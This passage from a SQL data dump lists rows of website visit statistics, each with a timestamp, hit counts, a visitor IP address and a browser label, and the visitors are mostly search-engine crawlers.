,'54.36.148.251','other'),(344374,1543698923,1,1,0,0,'54.36.148.157','other'),(344375,1543699149,1,1,0,0,'66.249.75.17','chrome'),(344376,1543699184,1,1,0,0,'46.229.168.148','other'),(344377,1543699189,1,1,0,0,'46.229.168.144','other'),(344378,1543699192,1,1,0,0,'46.229.168.146','other'),(344379,1543699206,1,1,0,0,'54.36.148.154','other'),(344380,1543699399,2,2,0,0,'54.36.148.156','other'),(344381,1543699480,1,1,0,0,'66.249.75.22','chrome'),(344382,1543699514,3,3,0,0,'66.249.75.21','chrome'),(344383,1543699712,1,1,0,0,'66.249.75.15','chrome'),(344384,1543699715,1,1,0,0,'54.36.148.211','other'),(344385,1543699813,1,1,0,0,'46.229.168.134','other'),(344386,1543699823,1,1,0,0,'8.29.198.27','other'),(344387,1543699893,1,1,0,0,'54.36.149.1','other'),(344388,1543699938,1,1,0,0,'8.29.198.25','other'),(344389,1543700233,1,1,0,0,'54.36.148.244','other'),(344390,1543700430,1,1,0,0,'54.36.148.26','other'),(344391,1543700632,1,1,0,0,'54.36.148.178','other'),(344392,1543700831,1,1,0,0,'66.249.75.157','chrome'),(344393,1543700836,1,1,0,0,'95.46.141.83','chrome'),(344394,1543700848,1,1,0,0,'66.249.75.140','chrome'),(344395,1543701359,1,1,0,0,'207.46.13.198','other'),(344396,1543701402,2,2,0,0,'46.211.110.24','chrome'),(344397,1543701540,1,1,0,0,'46.229.168.147','other'),(344398,1543701889,1,1,0,0,'54.36.148.230','other'),(344399,1543702069,1,1,0,0,'66.249.75.20','chrome'),(344400,1543702072,1,1,0,0,'46.229.168.151','other'),(344401,1543702341,2,2,0,0,'66.249.75.21','chrome'),(344402,1543702358,1,1,0,0,'46.229.168.134','other'),(344403,1543702360,1,1,0,0,'46.229.168.132','other'),(344404,1543702636,1,1,0,0,'54.36.149.84','other'),(344405,1543702731,1,1,0,0,'207.46.13.198','other'),(344406,1543703031,1,1,0,0,'54.36.148.222','other'),(344407,1543703712,1,1,0,0,'54.36.148.201','other'),(344408,1543704166,1,1,0,0,'54.36.149.105','other'),(344409,1543704450,1,1,0,0,'54.36.149.81','other'),(344410,1543704561,1,1,0,0,'46.229.168.145','other'),(344411,1543704651,1,1,0,0,'66.249.75.21','chrome'),(344412,1543704752,1,1,0,0,'54.36.148.43','other'),(344413,1543704854,1,1,0,0,'46.229.168.147','other'),(344414,1543704889,1,1,0,0,'54.36.148.49','other'),(344415,1543705411,2,2,0,0,'66.249.75.20','chrome'),(344416,1543705514,1,1,0,0,'54.36.148.57','other'),(344417,1543705771,1,1,0,0,'54.36.148.122','other'),(344418,1543706112,1,1,0,0,'66.249.75.17','chrome'),(344419,1543706396,1,1,0,0,'54.36.149.35','other'),(344420,1543706579,1,1,0,0,'54.36.148.104','other'),(344421,1543706672,1,1,0,0,'54.36.148.201','other'),(344422,1543706760,1,1,0,0,'54.36.148.117','other'),(344423,1543706887,18,18,0,0,'178.154.244.29','other'),(344424,1543706902,7,7,0,0,'178.154.244.11','other'),(344425,1543706910,1,1,0,0,'37.9.113.148','other'),(344426,1543707005,1,1,0,0,'54.36.149.85','other'),(344427,1543707017,3,3,0,0,'5.45.207.79','other'),(344428,1543707184,1,1,0,0,'54.36.149.13','other'),(344429,1543707271,1,1,0,0,'54.36.149.55','other'),(344430,1543707363,1,1,0,0,'54.36.148.120','other'),(344431,1543707578,2,2,0,0,'42.236.10.124','chrome'),(344432,1543707691,1,1,0,0,'180.163.220.47','chrome'),(344433,1543707694,1,1,0,0,'180.163.220.43','chrome'),(344434,1543708069,1,1,0,0,'54.36.148.12','other'),(344435,1543708132,1,1,0,0,'46.229.168.138','other'),(344436,1543708156,1,1,0,0,'178.154.244.11','other'),(344437,1543708207,1,1,0,0,'66.249.75.15','chrome'),(344438,1543708251,1,1,0,0,'66.249.75.20','chrome'),(344439,1543708322,1,1,0,0,'54.36.148.85','other'),(344440,1543708434,1,1,0,0,'54.36.148.76','other'),(344441,1543708440,1,1,0,0,'66.249.75.22','chrome'),(344442,1543708649,1,1,0,0,'8.29.198.26','other'),(344443,1543708774,1,1,0,0,'54.36.148.59','other'),(344444,1543709212,1,1,0,0,'54.36.148.71','other'),(344445,1543709399,1,1,0,0,'54.36.148.79','other'),(344446,1543709482,1,1,0,0,'207.46.13.198','other'),(344447,1543709493,1,1,0,0,'54.36.148.254','other'),(344448,1543709724,2,2,0,0,'66.249.75.22','chrome'),(344449,1543709791,1,1,0,0,'54.36.148.167','other'),(344450,1543710037,1,1,0,0,'54.36.148.194','other'),(344451,1543710045,1,1,0,0,'66.249.75.21','chrome'),(344452,1543710352,2,2,0,0,'66.249.75.17','chrome'),(344453,1543710372,1,1,0,0,'54.36.148.36','other'),(344454,1543710464,1,1,0,0,'54.36.148.73','other'),(344455,1543710666,1,1,0,0,'8.29.198.25','other'),(344456,1543710763,1,1,0,0,'8.29.198.27','other'),(344457,1543711146,1,1,0,0,'95.163.255.169','other'),(344458,1543711148,1,1,0,0,'95.163.255.174','other'),(344459,1543711246,2,2,0,0,'66.249.75.21','chrome'),(344460,1543711688,1,1,0,0,'46.229.168.144','other'),(344461,1543711772,1,1,0,0,'54.36.148.158','other'),(344462,1543711786,1,1,0,0,'54.36.148.135','other'),(344463,1543711787,1,1,0,0,'54.36.148.198','other'),(344464,1543711918,2,2,0,0,'51.38.128.13','other'),(344465,1543712181,1,1,0,0,'66.249.75.140','chrome'),(344466,1543712202,1,1,0,0,'77.247.181.165','other'),(344467,1543712223,1,1,0,0,'185.220.101.46','other'),(344468,1543712332,1,1,0,0,'66.249.75.20','chrome'),(344469,1543712451,1,1,0,0,'66.249.75.22','chrome'),(344470,1543712518,1,1,0,0,'54.36.148.35','other'),(344471,1543712822,1,1,0,0,'54.36.149.16','other'),(344472,1543713326,1,1,0,0,'178.154.244.29','other'),(344473,1543713408,1,1,0,0,'54.36.148.249','other'),(344474,1543713437,1,1,0,0,'54.36.148.167','other'),(344475,1543713626,1,1,0,0,'54.36.148.205','other'),(344476,1543713752,64,64,0,0,'46.4.107.106','other'),(344477,1543713822,1,1,0,0,'66.249.75.16','chrome'),(344478,1543713839,1,1,0,0,'66.249.75.20','chrome'),(344479,1543713895,1,1,0,0,'54.36.148.168','other'),(344480,1543713982,1,1,0,0,'66.249.75.140','chrome'),(344481,1543714089,1,1,0,0,'54.36.148.16','other'),(344482,1543714161,2,2,0,0,'66.249.75.21','chrome'),(344483,1543714210,1,1,0,0,'66.249.75.153','chrome'),(344484,1543714214,1,1,0,0,'78.154.165.2','msie'),(344485,1543714226,2,2,0,0,'91.209.11.236','other'),(344486,1543714240,1,1,0,0,'66.249.75.142','chrome'),(344487,1543714320,11,11,0,0,'207.46.13.198','other'),(344488,1543714469,1,1,0,0,'54.36.148.161','other'),(344489,1543714659,44,44,0,0,'46.4.107.106','other'),(344490,1543714682,1,1,0,0,'54.36.148.39','other'),(344491,1543714884,15,15,0,0,'178.154.244.29','other'),(344492,1543715033,6,6,0,0,'178.154.244.11','other'),(344493,1543715158,1,1,0,0,'46.229.168.151','other'),(344494,1543715308,2,2,0,0,'141.8.142.103','other'),(344495,1543715461,1,1,0,0,'66.249.75.142','chrome'),(344496,1543715563,44,44,0,0,'46.4.107.106','other'),(344497,1543715774,1,1,0,0,'46.229.168.148','other'),(344498,1543715875,1,1,0,0,'54.36.148.155','other'),(344499,1543715899,2,2,0,0,'178.154.244.29','other'),(344500,1543716165,1,1,0,0,'46.229.168.149','other'),(344501,1543716203,1,1,0,0,'54.36.148.108','other'),(344502,1543716464,12,12,0,0,'46.4.107.106','other'),(344503,1543716473,1,1,0,0,'66.249.75.20','chrome'),(344504,1543716512,1,1,0,0,'207.46.13.198','other'),(344505,1543716547,1,1,0,0,'54.36.148.183','other'),(344506,1543716600,1,1,0,0,'178.154.244.11','other'),(344507,1543716947,1,1,0,0,'54.36.148.86','other'),(344508,1543717472,1,1,0,0,'54.36.148.179','other'),(344509,1543717633,1,1,0,0,'40.77.167.136','other'),(344510,1543717762,2,2,0,0,'207.46.13.198','other'),(344511,1543717802,1,1,0,0,'54.36.148.134','other'),(344512,1543718058,1,1,0,0,'54.36.148.114','other'),(344513,1543718332,1,1,0,0,'66.249.75.140','chrome'),(344514,1543718388,1,1,0,0,'54.36.148.248','other'),(344515,1543718492,1,1,0,0,'46.229.168.140','other'),(344516,1543718498,1,1,0,0,'66.249.75.21','chrome'),(344517,1543718565,1,1,0,0,'54.36.148.180','other'),(344518,1543718573,2,2,0,0,'54.201.254.156','chrome'),(344519,1543718880,1,1,0,0,'13.66.139.0','other'),(344520,1543718903,1,1,0,0,'54.36.148.96','other'),(344521,1543718926,1,1,0,0,'54.36.149.60','other'),(344522,1543719010,1,1,0,0,'54.36.149.6','other'),(344523,1543719139,1,1,0,0,'54.36.149.82','other'),(344524,1543719399,1,1,0,0,'54.36.148.132','other'),(344525,1543719491,1,1,0,0,'8.29.198.27','other'),(344526,1543719577,1,1,0,0,'54.36.148.30','other'),(344527,1543719906,1,1,0,0,'54.36.148.105','other'),(344528,1543719931,1,1,0,0,'54.36.149.92','other'),(344529,1543719957,1,1,0,0,'54.36.148.240','other'),(344530,1543720637,1,1,0,0,'54.36.149.104','other'),(344531,1543721402,1,1,0,0,'46.229.168.154','other'),(344532,1543721438,1,1,0,0,'54.36.148.237','other'),(344533,1543721493,1,1,0,0,'178.154.244.29','other'),(344534,1543721514,1,1,0,0,'8.29.198.26','other'),(344535,1543721596,1,1,0,0,'8.29.198.27','other'),(344536,1543721780,1,1,0,0,'66.249.75.144','chrome'),(344537,1543722086,1,1,0,0,'54.36.149.30','other'),(344538,1543722409,1,1,0,0,'54.36.149.100','other'),(344539,1543722452,1,1,0,0,'40.77.167.138','other'),(344540,1543722992,1,1,0,0,'54.36.148.132','other'),(344541,1543723019,1,1,0,0,'46.229.168.150','other'),(344542,1543723259,3,3,0,0,'66.249.75.21','chrome'),(344543,1543723309,1,1,0,0,'54.36.148.249','other'),(344544,1543723423,1,1,0,0,'54.36.149.37','other'),(344545,1543723433,1,1,0,0,'54.36.148.155','other'),(344546,1543723460,1,1,0,0,'54.36.148.179','other'),(344547,1543723721,1,1,0,0,'54.36.148.61','other'),(344548,1543723785,1,1,0,0,'54.36.149.91','other'),(344549,1543723834,1,1,0,0,'54.36.149.27','other'),(344550,1543723854,1,1,0,0,'178.154.244.11','other'),(344551,1543723858,1,1,0,0,'178.154.244.29','other'),(344552,1543724604,1,1,0,0,'66.249.75.142','chrome'),(344553,1543724616,1,1,0,0,'207.46.13.198','other'),(344554,1543724694,1,1,0,0,'54.36.148.150','other'),(344555,1543724778,1,1,0,0,'54.36.148.124','other'),(344556,1543724841,1,1,0,0,'54.36.148.125','other'),(344557,1543724879,1,1,0,0,'40.77.167.136','other'),(344558,1543725134,4,4,0,0,'66.249.75.20','chrome'),(344559,1543725145,1,1,0,0,'54.36.149.47','other'),(344560,1543725204,2,2,0,0,'178.154.244.11','other'),(344561,1543725289,1,1,0,0,'54.36.149.8','other'),(344562,1543725324,3,3,0,0,'5.45.207.79','other'),(344563,1543725333,12,12,0,0,'178.154.244.29','other'),(344564,1543725444,2,2,0,0,'5.45.207.19','other'),(344565,1543725630,2,2,0,0,'54.36.148.150','other'),(344566,1543725636,1,1,0,0,'66.249.75.16','chrome'),(344567,1543725715,1,1,0,0,'66.249.75.144','chrome'),(344568,1543725739,1,1,0,0,'54.36.148.26','other'),(344569,1543725838,1,1,0,0,'54.36.148.151','other'),(344570,1543726165,1,1,0,0,'46.229.168.146','other'),(344571,1543726173,1,1,0,0,'46.229.168.138','other'),(344572,1543726181,1,1,0,0,'141.8.142.108','other'),(344573,1543726284,4,4,0,0,'178.154.244.29','other'),(344574,1543726306,1,1,0,0,'66.249.75.140','chrome'),(344575,1543726797,1,1,0,0,'5.45.207.79','other'),(344577,1543726923,3,3,0,0,'178.154.244.11','other'),(344578,1543727404,1,1,0,0,'46.229.168.146','other'),(344579,1543727599,1,1,0,0,'54.36.148.119','other'),(344580,1543727878,1,1,0,0,'54.36.148.97','other'),(344581,1543728071,1,1,0,0,'46.229.168.139','other'),(344582,1543728327,1,1,0,0,'54.36.149.107','other'),(344583,1543728403,1,1,0,0,'207.241.229.51','other'),(344584,1543728426,2,2,0,0,'207.241.229.213','other'),(344585,1543728591,1,1,0,0,'54.36.149.103','other'),(344586,1543728616,1,1,0,0,'54.36.148.25','other'),(344587,1543728814,2,2,0,0,'207.241.231.147','other'),(344588,1543728825,1,1,0,0,'46.229.168.144','other'),(344589,1543728855,1,1,0,0,'207.241.231.151','other'),(344590,1543729138,1,1,0,0,'54.36.149.21','other'),(344591,1543729225,1,1,0,0,'66.249.75.20','chrome'),(344592,1543729259,1,1,0,0,'66.249.75.21','chrome'),(344593,1543729265,1,1,0,0,'54.36.148.30','other'),(344594,1543729318,2,2,0,0,'178.154.244.29','other'),(344595,1543729439,1,1,0,0,'54.36.148.242','other'),(344596,1543729494,2,2,0,0,'91.196.178.131','firefox'),(344597,1543729609,1,1,0,0,'46.229.168.151','other'),(344598,1543729613,1,1,0,0,'46.229.168.154','other'),(344599,1543729631,1,1,0,0,'207.241.229.51','other'),(344600,1543729851,1,1,0,0,'54.36.148.54','other'),(344601,1543729858,3,3,0,0,'207.241.231.147','other'),(344602,1543730253,1,1,0,0,'54.36.148.104','other'),(344603,1543730321,1,1,0,0,'8.29.198.27','other'),(344604,1543730646,1,1,0,0,'173.252.87.11','other'),(344605,1543730647,1,1,0,0,'173.252.87.14','other'),(344606,1543730675,1,1,0,0,'66.249.75.20','chrome'),(344607,1543730677,1,1,0,0,'178.154.244.11','other'),(344608,1543730752,1,1,0,0,'66.249.75.17','chrome'),(344609,1543730768,1,1,0,0,'66.249.75.21','chrome'),(344610,1543730871,1,1,0,0,'66.249.75.22','chrome'),(344611,1543730913,1,1,0,0,'207.46.13.198','other'),(344612,1543730978,1,1,0,0,'54.36.148.142','other'),(344613,1543731065,2,2,0,0,'66.249.75.142','chrome'),(344614,1543731068,1,1,0,0,'207.241.229.51','other'),(344615,1543731114,2,2,0,0,'54.36.148.154','other'),(344616,1543731311,1,1,0,0,'54.36.148.88','other'),(344617,1543731313,1,1,0,0,'54.36.148.72','other'),(344618,1543731352,1,1,0,0,'46.229.168.132','other'),(344619,1543731366,1,1,0,0,'46.229.168.152','other'),(344620,1543731372,1,1,0,0,'207.241.229.213','other'),(344621,1543731443,2,2,0,0,'46.229.168.150','other'),(344622,1543731444,2,2,0,0,'178.154.244.29','other'),(344623,1543731469,2,2,0,0,'207.241.231.147','other'),(344624,1543731767,1,1,0,0,'54.36.148.61','other'),(344625,1543731796,1,1,0,0,'46.229.168.151','other'),(344626,1543731838,1,1,0,0,'54.36.148.38','other'),(344627,1543732264,1,1,0,0,'54.36.148.124','other'),(344628,1543732278,1,1,0,0,'54.36.148.233','other'),(344629,1543732359,1,1,0,0,'8.29.198.25','other'),(344630,1543732423,1,1,0,0,'8.29.198.27','other'),(344631,1543732580,1,1,0,0,'54.36.148.198','other'),(344632,1543732645,1,1,0,0,'66.249.75.140','chrome'),(344633,1543732655,1,1,0,0,'207.241.229.213','other'),(344634,1543732673,1,1,0,0,'54.36.149.75','other'),(344635,1543732748,1,1,0,0,'207.241.231.147','other'),(344636,1543732831,1,1,0,0,'66.249.75.21','chrome'),(344637,1543732994,1,1,0,0,'95.163.255.194','other'),(344638,1543732997,1,1,0,0,'95.163.255.152','other'),(344639,1543733212,1,1,0,0,'54.36.148.19','other'),(344640,1543733318,1,1,0,0,'54.36.148.33','other'),(344641,1543733376,1,1,0,0,'207.241.229.51','other'),(344642,1543733426,2,2,0,0,'34.212.103.249','chrome'),(344643,1543733643,1,1,0,0,'54.36.148.119','other'),(344644,1543733646,2,2,0,0,'207.241.229.213','other'),(344645,1543733649,1,1,0,0,'54.36.148.59','other'),(344646,1543733931,1,1,0,0,'207.241.231.147','other'),(344647,1543734263,1,1,0,0,'54.36.148.15','other'),(344648,1543734450,3,3,0,0,'178.154.244.11','other'),(344649,1543734459,5,5,0,0,'178.154.244.29','other'),(344650,1543734481,2,2,0,0,'5.45.207.79','other'),(344651,1543734643,1,1,0,0,'66.249.75.16','chrome'),(344652,1543734649,1,1,0,0,'54.36.148.24','other'),(344653,1543734715,1,1,0,0,'66.249.75.21','chrome'),(344654,1543734802,1,1,0,0,'54.36.148.38','other'),(344655,1543734889,1,1,0,0,'54.36.148.42','other'),(344656,1543735191,1,1,0,0,'54.36.148.53','other'),(344657,1543735264,1,1,0,0,'95.163.255.97','other'),(344658,1543735270,1,1,0,0,'95.163.255.98','other'),(344659,1543735858,1,1,0,0,'207.241.231.151','other'),(344660,1543735904,1,1,0,0,'207.241.231.147','other'),(344661,1543735975,1,1,0,0,'178.154.244.29','other'),(344662,1543736215,1,1,0,0,'207.241.229.148','other'),(344664,1543736340,1,1,0,0,'207.241.229.213','other'),(344665,1543736431,1,1,0,0,'178.154.244.11','other'),(344666,1543736440,1,1,0,0,'54.36.148.79','other'),(344667,1543736567,1,1,0,0,'54.36.148.37','other'),(344668,1543736596,1,1,0,0,'66.249.75.21','chrome'),(344669,1543736846,1,1,0,0,'95.163.255.159','other'),(344670,1543736850,1,1,0,0,'95.163.255.171','other'),(344671,1543736984,1,1,0,0,'207.241.231.147','other'),(344672,1543737116,3,3,0,0,'207.241.229.148','other'),(344673,1543737232,1,1,0,0,'46.229.168.145','other'),(344674,1543737258,1,1,0,0,'46.229.168.136','other'),(344675,1543737314,1,1,0,0,'54.36.148.96','other'),(344676,1543737687,1,1,0,0,'207.241.229.51','other'),(344677,1543737828,1,1,0,0,'54.36.148.56','other'),(344678,1543737933,2,2,0,0,'207.241.231.147','other'),(344679,1543737955,1,1,0,0,'207.46.13.198','other'),(344680,1543738228,2,2,0,0,'66.249.75.16','chrome'),(344681,1543738247,2,2,0,0,'66.249.75.20','chrome'),(344682,1543738303,1,1,0,0,'66.249.75.144','chrome'),(344683,1543738311,2,2,0,0,'66.249.75.21','chrome'),(344684,1543738390,1,1,0,0,'40.77.167.136','other'),(344685,1543738416,1,1,0,0,'54.36.148.101','other'),(344686,1543738472,1,1,0,0,'54.36.148.102','other'),(344687,1543738840,1,1,0,0,'54.36.148.132','other'),(344688,1543739382,1,1,0,0,'54.36.149.38','other'),(344689,1543739514,2,2,0,0,'207.46.13.30','other'),(344690,1543739577,1,1,0,0,'207.241.231.147','other'),(344691,1543739583,2,2,0,0,'178.154.244.29','other'),(344692,1543739674,1,1,0,0,'207.46.13.198','other'),(344693,1543740423,1,1,0,0,'54.36.149.103','other'),(344694,1543740460,1,1,0,0,'54.36.149.52','other'),(344695,1543740610,1,1,0,0,'54.36.148.40','other'),(344696,1543740663,1,1,0,0,'207.241.231.147','other'),(344697,1543740708,1,1,0,0,'46.229.168.148','other'),(344698,1543741000,1,1,0,0,'46.229.168.143','other'),(344699,1543741083,1,1,0,0,'54.36.148.102','other'),(344700,1543741155,1,1,0,0,'8.29.198.25','other'),(344701,1543741178,1,1,0,0,'178.154.244.11','other'),(344702,1543741223,1,1,0,0,'54.36.148.30','other'),(344703,1543741235,2,2,0,0,'95.163.255.98','other'),(344704,1543741243,2,2,0,0,'207.241.229.148','other'),(344705,1543741304,1,1,0,0,'54.36.148.178','other'),(344706,1543741320,2,2,0,0,'178.154.244.29','other'),(344707,1543741600,1,1,0,0,'54.36.148.226','other'),(344708,1543741903,1,1,0,0,'54.36.148.234','other'),(344709,1543742047,1,1,0,0,'54.36.149.42','other'),(344710,1543742049,1,1,0,0,'54.36.148.157','other'),(344711,1543742117,1,1,0,0,'54.36.149.73','other'),(344712,1543742306,1,1,0,0,'54.36.149.59','other'),(344713,1543742429,1,1,0,0,'54.36.149.4','other'),(344714,1543742536,1,1,0,0,'178.154.244.29','other'),(344715,1543742741,1,1,0,0,'207.241.229.148','other'),(344716,1543742939,1,1,0,0,'54.36.148.213','other'),(344717,1543742957,1,1,0,0,'54.36.149.2','other'),(344718,1543743214,2,2,0,0,'8.29.198.25','other'),(344719,1543743289,1,1,0,0,'54.36.148.50','other'),(344720,1543743406,1,1,0,0,'207.241.229.213','other'),(344721,1543743504,2,2,0,0,'46.229.168.147','other'),(344722,1543743593,4,4,0,0,'91.209.11.236','other'),(344723,1543743599,1,1,0,0,'178.154.244.11','other'),(344724,1543743760,1,1,0,0,'54.36.148.236','other'),(344725,1543743773,1,1,0,0,'54.36.148.88','other'),(344726,1543744051,2,2,0,0,'207.241.229.51','other'),(344727,1543744221,1,1,0,0,'54.36.148.144','other'),(344728,1543744350,1,1,0,0,'54.36.149.23','other'),(344729,1543744377,1,1,0,0,'207.241.229.148','other'),(344730,1543744492,1,1,0,0,'54.36.148.32','other'),(344731,1543744505,15,15,0,0,'178.154.244.29','other'),(344732,1543744566,10,10,0,0,'178.154.244.11','other'),(344733,1543744567,1,1,0,0,'54.36.148.153','other'),(344734,1543744648,3,3,0,0,'5.45.207.79','other'),(344735,1543744705,1,1,0,0,'54.36.148.53','other'),(344736,1543744977,1,1,0,0,'37.9.113.148','other'),(344737,1543745048,1,1,0,0,'54.36.149.99','other'),(344738,1543745119,1,1,0,0,'54.36.148.242','other'),(344739,1543745138,1,1,0,0,'54.36.148.225','other'),(344740,1543745192,1,1,0,0,'95.108.213.4','other'),(344741,1543745293,1,1,0,0,'66.249.75.20','chrome'),(344742,1543745357,1,1,0,0,'54.36.149.72','other'),(344743,1543745574,2,2,0,0,'144.76.120.197','other'),(344744,1543745579,5,5,0,0,'178.154.244.11','other'),(344745,1543745595,6,6,0,0,'178.154.244.29','other'),(344746,1543745717,1,1,0,0,'54.36.148.113','other'),(344747,1543745893,1,1,0,0,'54.36.148.56','other'),(344748,1543746108,1,1,0,0,'5.45.207.79','other'),(344749,1543746176,1,1,0,0,'46.229.168.137','other'),(344750,1543746194,1,1,0,0,'66.249.75.17','chrome'),(344751,1543746302,2,2,0,0,'207.241.229.213','other'),(344752,1543746407,1,1,0,0,'66.249.75.142','chrome'),(344753,1543746411,1,1,0,0,'54.36.148.189','other'),(344754,1543746480,1,1,0,0,'54.36.148.207','other'),(344755,1543746608,1,1,0,0,'54.36.149.58','other'),(344756,1543746646,1,1,0,0,'66.249.75.15','chrome'),(344757,1543746668,1,1,0,0,'66.249.75.20','chrome'),(344758,1543746899,1,1,0,0,'207.241.229.148','other'),(344759,1543746905,1,1,0,0,'54.36.148.197','other'),(344760,1543747169,1,1,0,0,'40.77.167.136','other'),(344761,1543747266,1,1,0,0,'40.77.167.138','other'),(344762,1543747794,1,1,0,0,'46.229.168.132','other'),(344763,1543747935,1,1,0,0,'54.36.149.25','other'),(344764,1543747958,2,2,0,0,'207.241.229.51','other'),(344765,1543747991,1,1,0,0,'66.249.75.22','chrome'),(344766,1543747992,1,1,0,0,'207.241.231.147','other'),(344767,1543748022,1,1,0,0,'54.36.148.127','other'),(344768,1543748049,1,1,0,0,'54.36.148.125','other'),(344769,1543748059,1,1,0,0,'46.229.168.154','other'),(344770,1543748175,1,1,0,0,'66.249.75.140','chrome'),(344771,1543748752,1,1,0,0,'207.46.13.198','other'),(344772,1543748800,1,1,0,0,'188.191.238.134','firefox'),(344773,1543748884,1,1,0,0,'95.163.255.191','other'),(344774,1543748887,1,1,0,0,'95.163.255.167','other'),(344775,1543749015,2,2,0,0,'108.59.8.70','other'),(344776,1543749017,1,1,0,0,'46.229.168.153','other'),(344777,1543749020,1,1,0,0,'46.229.168.139','other'),(344778,1543749111,2,2,0,0,'207.241.231.143','other'),(344779,1543749198,1,1,0,0,'207.241.229.213','other'),(344780,1543749309,1,1,0,0,'207.241.231.147','other'),(344781,1543750067,2,2,0,0,'40.77.167.136','other'),(344782,1543750088,1,1,0,0,'207.46.13.198','other'),(344783,1543750605,1,1,0,0,'66.249.75.17','chrome'),(344784,1543750630,1,1,0,0,'66.249.75.21','chrome'),(344785,1543750669,1,1,0,0,'54.36.149.72','other'),(344786,1543750725,2,2,0,0,'207.241.229.148','other'),(344787,1543751004,1,1,0,0,'207.46.13.198','other'),(344788,1543751110,2,2,0,0,'207.241.231.143','other'),(344789,1543751136,1,1,0,0,'54.36.148.178','other'),(344790,1543751155,1,1,0,0,'40.77.167.138','other'),(344791,1543751221,1,1,0,0,'207.241.231.147','other'),(344792,1543751308,1,1,0,0,'66.249.75.22','chrome'),(344793,1543751404,1,1,0,0,'54.36.148.159','other'),(344794,1543751412,1,1,0,0,'54.36.148.39','other'),(344795,1543751512,2,2,0,0,'144.76.81.72','other'),(344796,1543751540,1,1,0,0,'54.36.148.208','other'),(344797,1543751639,1,1,0,0,'54.36.149.75','other'),(344798,1543751740,1,1,0,0,'54.36.148.221','other'),(344799,1543751954,1,1,0,0,'54.36.148.186','other'),(344800,1543751980,1,1,0,0,'180.76.15.139','other'),(344801,1543751981,1,1,0,0,'180.76.15.136','other'),(344802,1543751991,1,1,0,0,'8.29.198.26','other'),(344803,1543752005,1,1,0,0,'54.36.148.23','other'),(344804,1543752314,2,2,0,0,'95.163.255.65','other'),(344805,1543752317,1,1,0,0,'95.163.255.63','other'),(344806,1543752609,1,1,0,0,'54.36.148.61','other'),(344807,1543752854,1,1,0,0,'95.163.255.66','other'),(344808,1543752870,1,1,0,0,'95.163.255.98','other'),(344809,1543752876,1,1,0,0,'95.163.255.92','other'),(344810,1543753081,4,4,0,0,'178.154.244.11','other'),(344811,1543753217,2,2,0,0,'207.241.229.148','other'),(344812,1543753241,2,2,0,0,'66.249.75.21','chrome'),(344813,1543753424,1,1,0,0,'54.36.149.52','other'),(344814,1543753984,1,1,0,0,'54.36.148.82','other'),(344815,1543753986,2,2,0,0,'178.154.244.29','other'),(344816,1543754064,1,1,0,0,'8.29.198.26','other'),(344817,1543754094,1,1,0,0,'8.29.198.27','other'),(344818,1543754119,2,2,0,0,'207.241.229.51','other'),(344819,1543754249,2,2,0,0,'207.241.231.151','other'),(344820,1543754299,1,1,0,0,'54.36.149.11','other'),(344821,1543754366,1,1,0,0,'207.241.229.148','other'),(344822,1543754390,1,1,0,0,'66.249.75.22','chrome'),(344823,1543754398,1,1,0,0,'54.36.148.52','other'),(344824,1543754763,2,2,0,0,'207.241.231.143','other'),(344825,1543754901,1,1,0,0,'46.229.168.133','other'),(344826,1543755001,1,1,0,0,'66.249.75.21','chrome'),(344827,1543755050,1,1,0,0,'54.36.148.140','other'),(344828,1543755114,14,14,0,0,'178.154.244.29','other'),(344829,1543755192,2,2,0,0,'207.241.229.213','other'),(344830,1543755242,1,1,0,0,'46.229.168.130','other'),(344831,1543755264,1,1,0,0,'5.45.207.19','other'),(344832,1543755386,13,13,0,0,'178.154.244.11','other'),(344833,1543755440,1,1,0,0,'207.241.229.51','other'),(344834,1543755511,1,1,0,0,'54.36.148.132','other'),(344835,1543755596,3,3,0,0,'5.45.207.79','other'),(344836,1543755812,1,1,0,0,'207.241.231.147','other'),(344837,1543756144,6,6,0,0,'178.154.244.29','other'),(344838,1543756221,1,1,0,0,'54.36.148.210','other'),(344839,1543756229,2,2,0,0,'207.241.229.148','other'),(344840,1543756287,6,6,0,0,'178.154.244.11','other'),(344841,1543756331,1,1,0,0,'66.249.75.16','chrome'),(344842,1543756347,1,1,0,0,'66.249.75.20','chrome'),(344843,1543756383,1,1,0,0,'54.36.148.59','other'),(344844,1543756452,1,1,0,0,'66.249.75.21','chrome'),(344845,1543756594,1,1,0,0,'54.36.149.98','other'),(344846,1543756716,1,1,0,0,'54.36.148.33','other'),(344847,1543756915,3,3,0,0,'207.241.229.213','other'),(344848,1543757071,5,5,0,0,'178.154.244.29','other'),(344849,1543757247,1,1,0,0,'207.241.229.51','other'),(344850,1543757610,1,1,0,0,'178.154.244.11','other'),(344851,1543758060,1,1,0,0,'207.241.231.151','other'),(344852,1543758061,1,1,0,0,'54.36.148.128','other'),(344853,1543758070,1,1,0,0,'54.36.148.247','other'),(344854,1543758125,1,1,0,0,'207.241.231.143','other'),(344855,1543758251,1,1,0,0,'66.249.75.155','chrome'),(344856,1543758268,1,1,0,0,'66.249.75.140','chrome'),(344857,1543758576,1,1,0,0,'54.36.148.78','other'),(344858,1543758737,3,3,0,0,'207.46.13.198','other'),(344859,1543758861,1,1,0,0,'54.36.148.51','other'),(344860,1543758889,1,1,0,0,'54.36.149.72','other'),(344861,1543759473,1,1,0,0,'54.36.148.244','other'),(344862,1543759556,1,1,0,0,'66.249.75.16','chrome'),(344863,1543759557,1,1,0,0,'66.249.75.20','chrome'),(344864,1543759575,1,1,0,0,'54.36.148.54','other'),(344865,1543759621,1,1,0,0,'207.241.229.213','other'),(344866,1543759762,1,1,0,0,'66.249.65.108','chrome'),(344867,1543759905,1,1,0,0,'46.229.168.139','other'),(344868,1543759908,1,1,0,0,'46.229.168.132','other'),(344869,1543759945,1,1,0,0,'54.36.149.59','other'),(344870,1543759958,1,1,0,0,'46.229.168.140','other'),(344871,1543759964,1,1,0,0,'207.241.231.143','other'),(344872,1543760035,2,2,0,0,'207.241.229.148','other'),(344873,1543760077,1,1,0,0,'66.249.75.17','chrome'),(344874,1543760078,1,1,0,0,'66.249.75.21','chrome'),(344875,1543760140,1,1,0,0,'54.36.148.218','other'),(344876,1543760290,1,1,0,0,'54.36.148.150','other'),(344877,1543760521,1,1,0,0,'207.46.13.198','other'),(344878,1543760584,2,2,0,0,'207.241.231.147','other'),(344879,1543760732,1,1,0,0,'54.36.149.71','other'),(344880,1543760736,1,1,0,0,'178.154.244.11','other'),(344881,1543760777,1,1,0,0,'54.36.148.176','other'),(344882,1543760784,1,1,0,0,'54.36.149.102','other'),(344883,1543760833,1,1,0,0,'54.36.148.29','other'),(344884,1543761002,1,1,0,0,'54.36.149.11','other'),(344885,1543761190,1,1,0,0,'46.229.168.136','other'),(344886,1543761199,1,1,0,0,'46.229.168.